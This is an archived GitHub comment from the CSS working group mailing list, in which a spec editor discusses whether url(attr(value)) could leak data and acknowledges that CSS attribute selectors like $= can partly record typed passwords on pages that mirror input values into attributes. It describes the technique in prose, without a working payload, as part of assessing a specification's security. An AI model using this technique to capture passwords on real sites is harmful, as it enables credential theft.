- From: Tab Atkins Jr. via GitHub <sysbot+gh@w3.org>
- Date: Thu, 22 Feb 2018 00:36:59 +0000
- To: public-css-archive@w3.org
> Hmmm, if you can insert a sheet on a host you controlled, If you control the host, you can already do whatever you want. I don't think that's an attack scenario we have to worry about. ^_^ Because yeah, the best that `url(attr(value))` can do is resolve to some URL relative to the stylesheet, which means it can only be intercepted by the person controlling the server that the stylesheet is hosted on. > It's more than that, really. If you type the password, $= would almost record the whole password string as you type. It has pitfalls, e.g. it cannot record repeated characters, and it wouldn't work if you use arrow keys etc. to insert character before. But yeah, it's reasonable enough to shrink the search space significantly. Ah, indeed, that's clever. (Tho again, it only works against things like React that spam the value property into the value attribute.) -- GitHub Notification of comment by tabatkins Please view or discuss this issue at https://github.com/w3c/csswg-drafts/issues/2339#issuecomment-367527212 using your GitHub account
Received on Thursday, 22 February 2018 00:37:03 UTC